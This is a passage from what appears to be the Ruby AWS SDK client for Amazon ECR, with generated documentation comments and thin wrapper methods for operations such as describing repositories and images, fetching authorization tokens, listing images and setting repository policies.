# end of the previous results that returned the `nextToken` value. This
# value is `null` when there are no more results to return. This option
# cannot be used when you specify images with `imageIds`.
#
# @option params [Integer] :max_results
# The maximum number of repository results returned by `DescribeImages`
# in paginated output. When this parameter is used, `DescribeImages`
# only returns `maxResults` results in a single page along with a
# `nextToken` response element. The remaining results of the initial
# request can be seen by sending another `DescribeImages` request with
# the returned `nextToken` value. This value can be between 1 and 1000.
# If this parameter is not used, then `DescribeImages` returns up to 100
# results and a `nextToken` value, if applicable. This option cannot be
# used when you specify images with `imageIds`.
#
# @option params [Types::DescribeImagesFilter] :filter
# The filter key and value with which to filter your `DescribeImages`
# results.
#
# @return [Types::DescribeImagesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeImagesResponse#image_details #image_details} => Array<Types::ImageDetail>
# * {Types::DescribeImagesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.describe_images({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_ids: [
# {
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# ],
# next_token: "NextToken",
# max_results: 1,
# filter: {
# tag_status: "TAGGED", # accepts TAGGED, UNTAGGED, ANY
# },
# })
#
# @example Response structure
#
# resp.image_details #=> Array
# resp.image_details[0].registry_id #=> String
# resp.image_details[0].repository_name #=> String
# resp.image_details[0].image_digest #=> String
# resp.image_details[0].image_tags #=> Array
# resp.image_details[0].image_tags[0] #=> String
# resp.image_details[0].image_size_in_bytes #=> Integer
# resp.image_details[0].image_pushed_at #=> Time
# resp.image_details[0].image_scan_status.status #=> String, one of "IN_PROGRESS", "COMPLETE", "FAILED"
# resp.image_details[0].image_scan_status.description #=> String
# resp.image_details[0].image_scan_findings_summary.image_scan_completed_at #=> Time
# resp.image_details[0].image_scan_findings_summary.vulnerability_source_updated_at #=> Time
# resp.image_details[0].image_scan_findings_summary.finding_severity_counts #=> Hash
# resp.image_details[0].image_scan_findings_summary.finding_severity_counts["FindingSeverity"] #=> Integer
# resp.image_details[0].image_manifest_media_type #=> String
# resp.image_details[0].artifact_media_type #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DescribeImages AWS API Documentation
#
# @overload describe_images(params = {})
# @param [Hash] params ({})
def describe_images(params = {}, options = {})
req = build_request(:describe_images, params)
req.send_request(options)
end
# Describes the settings for a registry. The replication configuration
# for a repository can be created or updated with the
# PutReplicationConfiguration API action.
#
# @return [Types::DescribeRegistryResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeRegistryResponse#registry_id #registry_id} => String
# * {Types::DescribeRegistryResponse#replication_configuration #replication_configuration} => Types::ReplicationConfiguration
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.replication_configuration.rules #=> Array
# resp.replication_configuration.rules[0].destinations #=> Array
# resp.replication_configuration.rules[0].destinations[0].region #=> String
# resp.replication_configuration.rules[0].destinations[0].registry_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DescribeRegistry AWS API Documentation
#
# @overload describe_registry(params = {})
# @param [Hash] params ({})
def describe_registry(params = {}, options = {})
req = build_request(:describe_registry, params)
req.send_request(options)
end
# Describes image repositories in a registry.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repositories to be described. If you do not specify a registry, the
# default registry is assumed.
#
# @option params [Array<String>] :repository_names
# A list of repositories to describe. If this parameter is omitted, then
# all repositories in a registry are described.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated
# `DescribeRepositories` request where `maxResults` was used and the
# results exceeded the value of that parameter. Pagination continues
# from the end of the previous results that returned the `nextToken`
# value. This value is `null` when there are no more results to return.
# This option cannot be used when you specify repositories with
# `repositoryNames`.
#
# <note markdown="1"> This token should be treated as an opaque identifier that is only used
# to retrieve the next items in a list and not for other programmatic
# purposes.
#
# </note>
#
# @option params [Integer] :max_results
# The maximum number of repository results returned by
# `DescribeRepositories` in paginated output. When this parameter is
# used, `DescribeRepositories` only returns `maxResults` results in a
# single page along with a `nextToken` response element. The remaining
# results of the initial request can be seen by sending another
# `DescribeRepositories` request with the returned `nextToken` value.
# This value can be between 1 and 1000. If this parameter is not used,
# then `DescribeRepositories` returns up to 100 results and a
# `nextToken` value, if applicable. This option cannot be used when you
# specify repositories with `repositoryNames`.
#
# @return [Types::DescribeRepositoriesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeRepositoriesResponse#repositories #repositories} => Array<Types::Repository>
# * {Types::DescribeRepositoriesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
#
# @example Example: To describe all repositories in the current account
#
# # The following example obtains a list and description of all repositories in the default registry to which the current
# # user has access.
#
# resp = client.describe_repositories({
# })
#
# resp.to_h outputs the following:
# {
# repositories: [
# {
# registry_id: "012345678910",
# repository_arn: "arn:aws:ecr:us-west-2:012345678910:repository/ubuntu",
# repository_name: "ubuntu",
# },
# {
# registry_id: "012345678910",
# repository_arn: "arn:aws:ecr:us-west-2:012345678910:repository/test",
# repository_name: "test",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.describe_repositories({
# registry_id: "RegistryId",
# repository_names: ["RepositoryName"],
# next_token: "NextToken",
# max_results: 1,
# })
#
# @example Response structure
#
# resp.repositories #=> Array
# resp.repositories[0].repository_arn #=> String
# resp.repositories[0].registry_id #=> String
# resp.repositories[0].repository_name #=> String
# resp.repositories[0].repository_uri #=> String
# resp.repositories[0].created_at #=> Time
# resp.repositories[0].image_tag_mutability #=> String, one of "MUTABLE", "IMMUTABLE"
# resp.repositories[0].image_scanning_configuration.scan_on_push #=> Boolean
# resp.repositories[0].encryption_configuration.encryption_type #=> String, one of "AES256", "KMS"
# resp.repositories[0].encryption_configuration.kms_key #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/DescribeRepositories AWS API Documentation
#
# @overload describe_repositories(params = {})
# @param [Hash] params ({})
def describe_repositories(params = {}, options = {})
req = build_request(:describe_repositories, params)
req.send_request(options)
end
# Retrieves an authorization token. An authorization token represents
# your IAM authentication credentials and can be used to access any
# Amazon ECR registry that your IAM principal has access to. The
# authorization token is valid for 12 hours.
#
# The `authorizationToken` returned is a base64 encoded string that can
# be decoded and used in a `docker login` command to authenticate to a
# registry. The AWS CLI offers an `get-login-password` command that
# simplifies the login process. For more information, see [Registry
# Authentication][1] in the *Amazon Elastic Container Registry User
# Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/Registries.html#registry_auth
#
# @option params [Array<String>] :registry_ids
# A list of AWS account IDs that are associated with the registries for
# which to get AuthorizationData objects. If you do not specify a
# registry, the default registry is assumed.
#
# @return [Types::GetAuthorizationTokenResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetAuthorizationTokenResponse#authorization_data #authorization_data} => Array<Types::AuthorizationData>
#
#
# @example Example: To obtain an authorization token
#
# # This example gets an authorization token for your default registry.
#
# resp = client.get_authorization_token({
# })
#
# resp.to_h outputs the following:
# {
# authorization_data: [
# {
# authorization_token: "QVdTOkN...",
# expires_at: Time.parse("1470951892432"),
# proxy_endpoint: "https://012345678901.dkr.ecr.us-west-2.amazonaws.com",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.get_authorization_token({
# registry_ids: ["RegistryId"],
# })
#
# @example Response structure
#
# resp.authorization_data #=> Array
# resp.authorization_data[0].authorization_token #=> String
# resp.authorization_data[0].expires_at #=> Time
# resp.authorization_data[0].proxy_endpoint #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetAuthorizationToken AWS API Documentation
#
# @overload get_authorization_token(params = {})
# @param [Hash] params ({})
def get_authorization_token(params = {}, options = {})
req = build_request(:get_authorization_token, params)
req.send_request(options)
end
# Retrieves the pre-signed Amazon S3 download URL corresponding to an
# image layer. You can only get URLs for image layers that are
# referenced in an image.
#
# When an image is pulled, the GetDownloadUrlForLayer API is called once
# per image layer that is not already cached.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# image layer to download. If you do not specify a registry, the default
# registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository that is associated with the image layer to
# download.
#
# @option params [required, String] :layer_digest
# The digest of the image layer to download.
#
# @return [Types::GetDownloadUrlForLayerResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetDownloadUrlForLayerResponse#download_url #download_url} => String
# * {Types::GetDownloadUrlForLayerResponse#layer_digest #layer_digest} => String
#
# @example Request syntax with placeholder values
#
# resp = client.get_download_url_for_layer({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# layer_digest: "LayerDigest", # required
# })
#
# @example Response structure
#
# resp.download_url #=> String
# resp.layer_digest #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetDownloadUrlForLayer AWS API Documentation
#
# @overload get_download_url_for_layer(params = {})
# @param [Hash] params ({})
def get_download_url_for_layer(params = {}, options = {})
req = build_request(:get_download_url_for_layer, params)
req.send_request(options)
end
# Retrieves the lifecycle policy for the specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository.
#
# @return [Types::GetLifecyclePolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetLifecyclePolicyResponse#registry_id #registry_id} => String
# * {Types::GetLifecyclePolicyResponse#repository_name #repository_name} => String
# * {Types::GetLifecyclePolicyResponse#lifecycle_policy_text #lifecycle_policy_text} => String
# * {Types::GetLifecyclePolicyResponse#last_evaluated_at #last_evaluated_at} => Time
#
# @example Request syntax with placeholder values
#
# resp = client.get_lifecycle_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
# resp.last_evaluated_at #=> Time
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetLifecyclePolicy AWS API Documentation
#
# @overload get_lifecycle_policy(params = {})
# @param [Hash] params ({})
def get_lifecycle_policy(params = {}, options = {})
req = build_request(:get_lifecycle_policy, params)
req.send_request(options)
end
# Retrieves the results of the lifecycle policy preview request for the
# specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository.
#
# @option params [Array<Types::ImageIdentifier>] :image_ids
# The list of imageIDs to be included.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated
# `GetLifecyclePolicyPreviewRequest` request where `maxResults` was used
# and the
results exceeded the value of that parameter. Pagination
# continues from the end of the
previous results that returned the
# `nextToken` value. This value is
`null` when there are no more
# results to return. This option cannot be used when you specify images
# with `imageIds`.
#
# @option params [Integer] :max_results
# The maximum number of repository results returned by
# `GetLifecyclePolicyPreviewRequest` in
paginated output. When this
# parameter is used, `GetLifecyclePolicyPreviewRequest` only returns
# `maxResults` results in a single page along with a `nextToken`
# response element. The remaining results of the initial request can be
# seen by sending
another `GetLifecyclePolicyPreviewRequest` request
# with the returned `nextToken`
value. This value can be between 1 and
# 1000. If this
parameter is not used, then
# `GetLifecyclePolicyPreviewRequest` returns up to
100 results and a
# `nextToken` value, if
applicable. This option cannot be used when you
# specify images with `imageIds`.
#
# @option params [Types::LifecyclePolicyPreviewFilter] :filter
# An optional parameter that filters results based on image tag status
# and all tags, if tagged.
#
# @return [Types::GetLifecyclePolicyPreviewResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetLifecyclePolicyPreviewResponse#registry_id #registry_id} => String
# * {Types::GetLifecyclePolicyPreviewResponse#repository_name #repository_name} => String
# * {Types::GetLifecyclePolicyPreviewResponse#lifecycle_policy_text #lifecycle_policy_text} => String
# * {Types::GetLifecyclePolicyPreviewResponse#status #status} => String
# * {Types::GetLifecyclePolicyPreviewResponse#next_token #next_token} => String
# * {Types::GetLifecyclePolicyPreviewResponse#preview_results #preview_results} => Array<Types::LifecyclePolicyPreviewResult>
# * {Types::GetLifecyclePolicyPreviewResponse#summary #summary} => Types::LifecyclePolicyPreviewSummary
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.get_lifecycle_policy_preview({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_ids: [
# {
# image_digest: "ImageDigest",
# image_tag: "ImageTag",
# },
# ],
# next_token: "NextToken",
# max_results: 1,
# filter: {
# tag_status: "TAGGED", # accepts TAGGED, UNTAGGED, ANY
# },
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
# resp.status #=> String, one of "IN_PROGRESS", "COMPLETE", "EXPIRED", "FAILED"
# resp.next_token #=> String
# resp.preview_results #=> Array
# resp.preview_results[0].image_tags #=> Array
# resp.preview_results[0].image_tags[0] #=> String
# resp.preview_results[0].image_digest #=> String
# resp.preview_results[0].image_pushed_at #=> Time
# resp.preview_results[0].action.type #=> String, one of "EXPIRE"
# resp.preview_results[0].applied_rule_priority #=> Integer
# resp.summary.expiring_image_total_count #=> Integer
#
#
# The following waiters are defined for this operation (see {Client#wait_until} for detailed usage):
#
# * lifecycle_policy_preview_complete
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetLifecyclePolicyPreview AWS API Documentation
#
# @overload get_lifecycle_policy_preview(params = {})
# @param [Hash] params ({})
def get_lifecycle_policy_preview(params = {}, options = {})
req = build_request(:get_lifecycle_policy_preview, params)
req.send_request(options)
end
# Retrieves the permissions policy for a registry.
#
# @return [Types::GetRegistryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetRegistryPolicyResponse#registry_id #registry_id} => String
# * {Types::GetRegistryPolicyResponse#policy_text #policy_text} => String
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetRegistryPolicy AWS API Documentation
#
# @overload get_registry_policy(params = {})
# @param [Hash] params ({})
def get_registry_policy(params = {}, options = {})
req = build_request(:get_registry_policy, params)
req.send_request(options)
end
# Retrieves the repository policy for the specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository with the policy to retrieve.
#
# @return [Types::GetRepositoryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetRepositoryPolicyResponse#registry_id #registry_id} => String
# * {Types::GetRepositoryPolicyResponse#repository_name #repository_name} => String
# * {Types::GetRepositoryPolicyResponse#policy_text #policy_text} => String
#
#
# @example Example: To get the current policy for a repository
#
# # This example obtains the repository policy for the repository named ubuntu.
#
# resp = client.get_repository_policy({
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# policy_text: "{\n \"Version\" : \"2008-10-17\",\n \"Statement\" : [ {\n \"Sid\" : \"new statement\",\n \"Effect\" : \"Allow\",\n \"Principal\" : {\n \"AWS\" : \"arn:aws:iam::012345678901:role/CodeDeployDemo\"\n },\n\"Action\" : [ \"ecr:GetDownloadUrlForLayer\", \"ecr:BatchGetImage\", \"ecr:BatchCheckLayerAvailability\" ]\n } ]\n}",
# registry_id: "012345678901",
# repository_name: "ubuntu",
# }
#
# @example Request syntax with placeholder values
#
# resp = client.get_repository_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/GetRepositoryPolicy AWS API Documentation
#
# @overload get_repository_policy(params = {})
# @param [Hash] params ({})
def get_repository_policy(params = {}, options = {})
req = build_request(:get_repository_policy, params)
req.send_request(options)
end
# Notifies Amazon ECR that you intend to upload an image layer.
#
# When an image is pushed, the InitiateLayerUpload API is called once
# per image layer that has not already been uploaded. Whether or not an
# image layer has been uploaded is determined by the
# BatchCheckLayerAvailability API action.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry to which you intend to
# upload layers. If you do not specify a registry, the default registry
# is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to which you intend to upload layers.
#
# @return [Types::InitiateLayerUploadResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::InitiateLayerUploadResponse#upload_id #upload_id} => String
# * {Types::InitiateLayerUploadResponse#part_size #part_size} => Integer
#
# @example Request syntax with placeholder values
#
# resp = client.initiate_layer_upload({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# })
#
# @example Response structure
#
# resp.upload_id #=> String
# resp.part_size #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/InitiateLayerUpload AWS API Documentation
#
# @overload initiate_layer_upload(params = {})
# @param [Hash] params ({})
def initiate_layer_upload(params = {}, options = {})
req = build_request(:initiate_layer_upload, params)
req.send_request(options)
end
# Lists all the image IDs for the specified repository.
#
# You can filter images based on whether or not they are tagged by using
# the `tagStatus` filter and specifying either `TAGGED`, `UNTAGGED` or
# `ANY`. For example, you can filter your results to return only
# `UNTAGGED` images and then pipe that result to a BatchDeleteImage
# operation to delete them. Or, you can filter your results to return
# only `TAGGED` images to list all of the tags in your repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to list images. If you do not specify a registry,
# the default registry is assumed.
#
# @option params [required, String] :repository_name
# The repository with image IDs to be listed.
#
# @option params [String] :next_token
# The `nextToken` value returned from a previous paginated `ListImages`
# request where `maxResults` was used and the results exceeded the value
# of that parameter. Pagination continues from the end of the previous
# results that returned the `nextToken` value. This value is `null` when
# there are no more results to return.
#
# <note markdown="1"> This token should be treated as an opaque identifier that is only used
# to retrieve the next items in a list and not for other programmatic
# purposes.
#
# </note>
#
# @option params [Integer] :max_results
# The maximum number of image results returned by `ListImages` in
# paginated output. When this parameter is used, `ListImages` only
# returns `maxResults` results in a single page along with a `nextToken`
# response element. The remaining results of the initial request can be
# seen by sending another `ListImages` request with the returned
# `nextToken` value. This value can be between 1 and 1000. If this
# parameter is not used, then `ListImages` returns up to 100 results and
# a `nextToken` value, if applicable.
#
# @option params [Types::ListImagesFilter] :filter
# The filter key and value with which to filter your `ListImages`
# results.
#
# @return [Types::ListImagesResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListImagesResponse#image_ids #image_ids} => Array<Types::ImageIdentifier>
# * {Types::ListImagesResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
#
# @example Example: To list all images in a repository
#
# # This example lists all of the images in the repository named ubuntu in the default registry in the current account.
#
# resp = client.list_images({
# repository_name: "ubuntu",
# })
#
# resp.to_h outputs the following:
# {
# image_ids: [
# {
# image_digest: "sha256:764f63476bdff6d83a09ba2a818f0d35757063724a9ac3ba5019c56f74ebf42a",
# image_tag: "precise",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.list_images({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# next_token: "NextToken",
# max_results: 1,
# filter: {
# tag_status: "TAGGED", # accepts TAGGED, UNTAGGED, ANY
# },
# })
#
# @example Response structure
#
# resp.image_ids #=> Array
# resp.image_ids[0].image_digest #=> String
# resp.image_ids[0].image_tag #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/ListImages AWS API Documentation
#
# @overload list_images(params = {})
# @param [Hash] params ({})
def list_images(params = {}, options = {})
req = build_request(:list_images, params)
req.send_request(options)
end
# List the tags for an Amazon ECR resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) that identifies the resource for which
# to list the tags. Currently, the only supported resource is an Amazon
# ECR repository.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#tags #tags} => Array<Types::Tag>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# resource_arn: "Arn", # required
# })
#
# @example Response structure
#
# resp.tags #=> Array
# resp.tags[0].key #=> String
# resp.tags[0].value #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/ListTagsForResource AWS API Documentation
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
req = build_request(:list_tags_for_resource, params)
req.send_request(options)
end
# Creates or updates the image manifest and tags associated with an
# image.
#
# When an image is pushed and all new image layers have been uploaded,
# the PutImage API is called once to create or update the image manifest
# and the tags associated with the image.
#
# <note markdown="1"> This operation is used by the Amazon ECR proxy and is not generally
# used by customers for pulling and pushing images. In most cases, you
# should use the `docker` CLI to pull, tag, and push images.
#
# </note>
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to put the image. If you do not specify a
# registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository in which to put the image.
#
# @option params [required, String] :image_manifest
# The image manifest corresponding to the image to be uploaded.
#
# @option params [String] :image_manifest_media_type
# The media type of the image manifest. If you push an image manifest
# that does not contain the `mediaType` field, you must specify the
# `imageManifestMediaType` in the request.
#
# @option params [String] :image_tag
# The tag to associate with the image. This parameter is required for
# images that use the Docker Image Manifest V2 Schema 2 or Open
# Container Initiative (OCI) formats.
#
# @option params [String] :image_digest
# The image digest of the image manifest corresponding to the image.
#
# @return [Types::PutImageResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutImageResponse#image #image} => Types::Image
#
# @example Request syntax with placeholder values
#
# resp = client.put_image({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_manifest: "ImageManifest", # required
# image_manifest_media_type: "MediaType",
# image_tag: "ImageTag",
# image_digest: "ImageDigest",
# })
#
# @example Response structure
#
# resp.image.registry_id #=> String
# resp.image.repository_name #=> String
# resp.image.image_id.image_digest #=> String
# resp.image.image_id.image_tag #=> String
# resp.image.image_manifest #=> String
# resp.image.image_manifest_media_type #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutImage AWS API Documentation
#
# @overload put_image(params = {})
# @param [Hash] params ({})
def put_image(params = {}, options = {})
req = build_request(:put_image, params)
req.send_request(options)
end
# Updates the image scanning configuration for the specified repository.
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to update the image scanning configuration
# setting. If you do not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository in which to update the image scanning
# configuration setting.
#
# @option params [required, Types::ImageScanningConfiguration] :image_scanning_configuration
# The image scanning configuration for the repository. This setting
# determines whether images are scanned for known vulnerabilities after
# being pushed to the repository.
#
# @return [Types::PutImageScanningConfigurationResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutImageScanningConfigurationResponse#registry_id #registry_id} => String
# * {Types::PutImageScanningConfigurationResponse#repository_name #repository_name} => String
# * {Types::PutImageScanningConfigurationResponse#image_scanning_configuration #image_scanning_configuration} => Types::ImageScanningConfiguration
#
# @example Request syntax with placeholder values
#
# resp = client.put_image_scanning_configuration({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_scanning_configuration: { # required
# scan_on_push: false,
# },
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.image_scanning_configuration.scan_on_push #=> Boolean
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutImageScanningConfiguration AWS API Documentation
#
# @overload put_image_scanning_configuration(params = {})
# @param [Hash] params ({})
def put_image_scanning_configuration(params = {}, options = {})
req = build_request(:put_image_scanning_configuration, params)
req.send_request(options)
end
# Updates the image tag mutability settings for the specified
# repository. For more information, see [Image Tag Mutability][1] in the
# *Amazon Elastic Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-tag-mutability.html
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository in which to update the image tag mutability settings. If
# you do not specify a registry, the default registry is assumed.
#
# @option params [required, String] :repository_name
# The name of the repository in which to update the image tag mutability
# settings.
#
# @option params [required, String] :image_tag_mutability
# The tag mutability setting for the repository. If `MUTABLE` is
# specified, image tags can be overwritten. If `IMMUTABLE` is specified,
# all image tags within the repository will be immutable which will
# prevent them from being overwritten.
#
# @return [Types::PutImageTagMutabilityResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutImageTagMutabilityResponse#registry_id #registry_id} => String
# * {Types::PutImageTagMutabilityResponse#repository_name #repository_name} => String
# * {Types::PutImageTagMutabilityResponse#image_tag_mutability #image_tag_mutability} => String
#
# @example Request syntax with placeholder values
#
# resp = client.put_image_tag_mutability({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# image_tag_mutability: "MUTABLE", # required, accepts MUTABLE, IMMUTABLE
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.image_tag_mutability #=> String, one of "MUTABLE", "IMMUTABLE"
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutImageTagMutability AWS API Documentation
#
# @overload put_image_tag_mutability(params = {})
# @param [Hash] params ({})
def put_image_tag_mutability(params = {}, options = {})
req = build_request(:put_image_tag_mutability, params)
req.send_request(options)
end
# Creates or updates the lifecycle policy for the specified repository.
# For more information, see [Lifecycle Policy Template][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/LifecyclePolicies.html
#
# @option params [String] :registry_id
# The AWS account ID associated with the registry that contains the
# repository. If you do
not specify a registry, the default registry is
# assumed.
#
# @option params [required, String] :repository_name
# The name of the repository to receive the policy.
#
# @option params [required, String] :lifecycle_policy_text
# The JSON repository policy text to apply to the repository.
#
# @return [Types::PutLifecyclePolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutLifecyclePolicyResponse#registry_id #registry_id} => String
# * {Types::PutLifecyclePolicyResponse#repository_name #repository_name} => String
# * {Types::PutLifecyclePolicyResponse#lifecycle_policy_text #lifecycle_policy_text} => String
#
# @example Request syntax with placeholder values
#
# resp = client.put_lifecycle_policy({
# registry_id: "RegistryId",
# repository_name: "RepositoryName", # required
# lifecycle_policy_text: "LifecyclePolicyText", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.repository_name #=> String
# resp.lifecycle_policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutLifecyclePolicy AWS API Documentation
#
# @overload put_lifecycle_policy(params = {})
# @param [Hash] params ({})
def put_lifecycle_policy(params = {}, options = {})
req = build_request(:put_lifecycle_policy, params)
req.send_request(options)
end
# Creates or updates the permissions policy for your registry.
#
# A registry policy is used to specify permissions for another AWS
# account and is used when configuring cross-account replication. For
# more information, see [Registry permissions][1] in the *Amazon Elastic
# Container Registry User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html
#
# @option params [required, String] :policy_text
# The JSON policy text to apply to your registry. The policy text
# follows the same format as IAM policy text. For more information, see
# [Registry permissions][1] in the *Amazon Elastic Container Registry
# User Guide*.
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html
#
# @return [Types::PutRegistryPolicyResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::PutRegistryPolicyResponse#registry_id #registry_id} => String
# * {Types::PutRegistryPolicyResponse#policy_text #policy_text} => String
#
# @example Request syntax with placeholder values
#
# resp = client.put_registry_policy({
# policy_text: "RegistryPolicyText", # required
# })
#
# @example Response structure
#
# resp.registry_id #=> String
# resp.policy_text #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/ecr-2015-09-21/PutRegistryPolicy AWS API Documentation
#
# @overload put_registry_policy(params = {})
# @param [Hash] params ({})
def put_registry_policy(params = {}, options = {})
req = build_request(:put_registry_policy, params)
req.send_request(options)
end
# Creates or updates the replication configuration for a registry. The
# existing replication configuration for a repository can be retrieved
# with the DescribeRegistry API action. The first time the
# PutReplicationConfiguration API is called, a service-linked IAM role
# is created in your account for the replication process. For more
# information, see [Using Service-Linked Roles for Amazon ECR][1] in the
# *Amazon Elastic Container Registry User Guide*.
#
# <note markdown="1"> When configuring cross-account replication, the destination account
# must grant the source account permission to replicate. This permission
# is controlled using a registry permissions policy. For more
# information, see PutRegistryPolicy.
#
# </note>
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonECR/latest/userguide/using-service-linked-roles.html
#
